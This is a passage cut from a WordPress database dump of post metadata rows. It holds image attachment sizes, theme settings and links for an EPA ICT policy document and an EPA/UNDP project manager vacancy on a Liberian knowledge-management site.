ze\";i:139399;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:21:\"STARR-2-1920x1080.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:333885;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:19:\"STARR-2-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43489;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:19:\"STARR-2-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78363;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:20:\"STARR-2-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:146629;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39281,5906,'_last_editor_used_jetpack','block-editor'),(39099,5875,'_edit_last','38'),(39097,5875,'_wp_old_date','2026-04-22'),(39098,5875,'_thumbnail_id','5876'),(39135,5878,'_edit_last','38'),(39102,5875,'kava_extra_enable_breadcrumbs','inherit'),(39103,5875,'post_formats',''),(39104,5875,'gallery_tab',''),(39105,5875,'kava_extra_gallery_images',''),(39106,5875,'link_tab',''),(39107,5875,'kava_extra_link',''),(39108,5875,'kava_extra_link_target','_blank'),(39109,5875,'quote_tab',''),(39110,5875,'kava_extra_quote_text',''),(39111,5875,'kava_extra_quote_cite',''),(39112,5875,'audio_tab',''),(39113,5875,'kava_extra_audio',''),(39114,5875,'kava_extra_audio_loop','false'),(39115,5875,'kava_extra_audio_autoplay','false'),(39116,5875,'kava_extra_audio_preload','false'),(39117,5875,'video_tab',''),(39118,5875,'kava_extra_video_type','library'),(39119,5875,'kava_extra_video_library',''),(39120,5875,'kava_extra_video_external',''),(39121,5875,'kava_extra_video_poster',''),(39122,5875,'kava_extra_video_width','770'),(39123,5875,'kava_extra_video_height','480'),(39124,5875,'kava_extra_video_loop','false'),(39125,5875,'kava_extra_video_autoplay','false'),(39126,5875,'kava_extra_video_preload','false'),(39127,5878,'_edit_lock','1776955534:38'),(39128,5878,'_last_editor_used_jetpack','block-editor'),(39129,5879,'_wp_attached_file','2026/04/Dr.jpg'),(39130,5879,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1074;s:6:\"height\";i:1280;s:4:\"file\";s:14:\"2026/04/Dr.jpg\";s:8:\"filesize\";i:167622;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"Dr-252x300.jpg\";s:5:\"width\";i:252;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18496;}s:5:\"large\";a:5:{s:4:\"file\";s:15:\"Dr-859x1024.jpg\";s:5:\"width\";i:859;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:138617;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"Dr-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7100;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:14:\"Dr-768x915.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:915;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:114601;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:14:\"Dr-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23954;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:13:\"Dr-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4934;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:14:\"Dr-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13948;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:14:\"Dr-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33722;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:14:\"Dr-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38081;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:14:\"Dr-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51213;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:15:\"Dr-1074x650.jpg\";s:5:\"width\";i:1074;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:129827;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:16:\"Dr-1074x1080.jpg\";s:5:\"width\";i:1074;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:194513;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:14:\"Dr-600x715.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:715;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75867;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:14:\"Dr-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73223;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:15:\"Dr-1074x640.jpg\";s:5:\"width\";i:1074;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122325;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39145,5881,'_edit_last','38'),(39133,5878,'_wp_old_date','2026-04-23'),(39134,5878,'_thumbnail_id','5879'),(39140,5882,'_wp_attached_file','2026/04/today.jpg'),(39141,5882,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:1280;s:4:\"file\";s:17:\"2026/04/today.jpg\";s:8:\"filesize\";i:228457;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"today-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22521;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"today-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:182995;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"today-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8714;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"today-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:182995;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"today-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31125;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:16:\"today-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6011;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:17:\"today-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17773;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:17:\"today-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44592;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:17:\"today-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53902;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:17:\"today-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68701;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:17:\"today-960x650.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:157281;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:18:\"today-960x1080.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:243029;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:17:\"today-600x800.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121002;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:17:\"today-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100748;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:17:\"today-960x640.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:150799;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39148,5881,'kava_extra_enable_breadcrumbs','inherit'),(39180,5884,'_edit_last','38'),(39144,5881,'_thumbnail_id','5882'),(39149,5881,'post_formats',''),(39150,5881,'gallery_tab',''),(39151,5881,'kava_extra_gallery_images',''),(39152,5881,'link_tab',''),(39153,5881,'kava_extra_link',''),(39154,5881,'kava_extra_link_target','_blank'),(39155,5881,'quote_tab',''),(39156,5881,'kava_extra_quote_text',''),(39157,5881,'kava_extra_quote_cite',''),(39158,5881,'audio_tab',''),(39159,5881,'kava_extra_audio',''),(39160,5881,'kava_extra_audio_loop','false'),(39161,5881,'kava_extra_audio_autoplay','false'),(39162,5881,'kava_extra_audio_preload','false'),(39163,5881,'video_tab',''),(39164,5881,'kava_extra_video_type','library'),(39165,5881,'kava_extra_video_library',''),(39166,5881,'kava_extra_video_external',''),(39167,5881,'kava_extra_video_poster',''),(39168,5881,'kava_extra_video_width','770'),(39169,5881,'kava_extra_video_height','480'),(39170,5881,'kava_extra_video_loop','false'),(39171,5881,'kava_extra_video_autoplay','false'),(39172,5881,'kava_extra_video_preload','false'),(39173,5884,'_edit_lock','1777463152:38'),(39174,5884,'_last_editor_used_jetpack','block-editor'),(39175,5885,'_wp_attached_file','2026/04/today-1.jpg'),(39176,5885,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:4:\"file\";s:19:\"2026/04/today-1.jpg\";s:8:\"filesize\";i:216234;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"today-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9113;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"today-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73566;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"today-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5067;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"today-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44874;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"today-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136058;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"today-1-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15734;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:18:\"today-1-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3311;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:19:\"today-1-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10318;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:19:\"today-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27316;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:19:\"today-1-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35044;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:19:\"today-1-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37577;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:20:\"today-1-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87957;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:21:\"today-1-1920x1080.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:188600;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:19:\"today-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29412;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:19:\"today-1-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60016;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:20:\"today-1-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96603;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39280,5906,'_edit_lock','1779806828:38'),(39179,5884,'_thumbnail_id','5885'),(39183,5884,'kava_extra_enable_breadcrumbs','inherit'),(39184,5884,'post_formats',''),(39185,5884,'gallery_tab',''),(39186,5884,'kava_extra_gallery_images',''),(39187,5884,'link_tab',''),(39188,5884,'kava_extra_link',''),(39189,5884,'kava_extra_link_target','_blank'),(39190,5884,'quote_tab',''),(39191,5884,'kava_extra_quote_text',''),(39192,5884,'kava_extra_quote_cite',''),(39193,5884,'audio_tab',''),(39194,5884,'kava_extra_audio',''),(39195,5884,'kava_extra_audio_loop','false'),(39196,5884,'kava_extra_audio_autoplay','false'),(39197,5884,'kava_extra_audio_preload','false'),(39198,5884,'video_tab',''),(39199,5884,'kava_extra_video_type','library'),(39200,5884,'kava_extra_video_library',''),(39201,5884,'kava_extra_video_external',''),(39202,5884,'kava_extra_video_poster',''),(39203,5884,'kava_extra_video_width','770'),(39204,5884,'kava_extra_video_height','480'),(39205,5884,'kava_extra_video_loop','false'),(39206,5884,'kava_extra_video_autoplay','false'),(39207,5884,'kava_extra_video_preload','false'),(39235,5895,'_edit_last','38'),(39234,5895,'_edit_lock','1779805551:38'),(39233,5895,'_last_editor_used_jetpack','classic-editor'),(39212,5889,'_last_editor_used_jetpack','classic-editor'),(39213,5889,'_edit_lock','1779958296:38'),(39214,5889,'_edit_last','38'),(39215,5890,'_wp_attached_file','2026/05/Screenshot-2026-05-10-at-14.52.57.png'),(39216,5890,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1194;s:6:\"height\";i:1498;s:4:\"file\";s:45:\"2026/05/Screenshot-2026-05-10-at-14.52.57.png\";s:8:\"filesize\";i:260657;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-10-at-14.52.57-239x300.png\";s:5:\"width\";i:239;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:27604;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-05-10-at-14.52.57-816x1024.png\";s:5:\"width\";i:816;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:163200;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-10-at-14.52.57-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13316;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-10-at-14.52.57-768x964.png\";s:5:\"width\";i:768;s:6:\"height\";i:964;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:149377;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-10-at-14.52.57-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:26706;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:44:\"Screenshot-2026-05-10-at-14.52.57-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6381;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-10-at-14.52.57-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25170;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-10-at-14.52.57-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:57356;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-10-at-14.52.57-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:56668;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-10-at-14.52.57-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:60314;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-05-10-at-14.52.57-1170x650.png\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:99737;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-05-10-at-14.52.57-1194x1080.png\";s:5:\"width\";i:1194;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:211475;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-10-at-14.52.57-600x753.png\";s:5:\"width\";i:600;s:6:\"height\";i:753;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:104939;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-10-at-14.52.57-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:113569;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-05-10-at-14.52.57-1194x640.png\";s:5:\"width\";i:1194;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:78056;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39220,5892,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:699132;}'),(39219,5892,'_wp_attached_file','2026/05/EPA-ICT-POLICY-Final.pdf'),(39221,5889,'_wp_page_template','default'),(39222,5889,'download_link','https://ekmsliberia.info/wp-content/uploads/2026/05/EPA-ICT-POLICY-Final.pdf'),(39223,5889,'by','EPA'),(39224,5889,'year','April 1, 2026'),(39225,5889,'_pods_document_cover_image','a:1:{i:0;i:5890;}'),(39416,5889,'document_cover_image','5890'),(39227,5889,'_pods_attached_document','a:1:{i:0;i:5892;}'),(39417,5889,'attached_document','5892'),(39236,5895,'_wp_page_template','default'),(39237,5895,'closed_date','2026-06-09'),(39238,5895,'owner','EPA/UNDP'),(39239,5895,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2026/05/Final-TOR_Project-Manager_SARTLASG.pdf'),(39240,5897,'_wp_attached_file','2026/05/Final-TOR_Project-Manager_SARTLASG.pdf'),(39241,5897,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:258701;}'),(39242,5899,'_wp_attached_file','2026/05/Final-Recruitment-strategy-SARTLA-Project-Manager-SARTLASG.docx'),(39243,5899,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:62200;}'),(39244,5902,'_edit_lock','1779806073:38'),(39245,5902,'_last_editor_used_jetpack','block-editor'),(39246,5903,'_wp_attached_file','2026/05/today-news-2.jpg'),(39247,5903,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:24:\"2026/05/today-news-2.jpg\";s:8:\"filesize\";i:248551;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"today-news-2-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19501;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"today-news-2-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:151665;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"today-news-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8549;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"today-news-2-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94467;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"today-news-2-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:286211;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"today-news-2-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26697;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:23:\"today-news-2-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5337;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:24:\"today-news-2-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17232;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:24:\"today-news-2-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44446;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:24:\"today-news-2-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51814;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:24:\"today-news-2-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61534;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:25:\"today-news-2-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149555;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:26:\"today-news-2-1600x1080.jpg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:306034;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:24:\"today-news-2-600x450.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62872;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:24:\"today-news-2-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96315;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:25:\"today-news-2-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:154555;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39248,5904,'_wp_attached_file','2026/05/today-news.jpg'),(39249,5904,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:22:\"2026/05/today-news.jpg\";s:8:\"filesize\";i:362865;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"today-news-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:1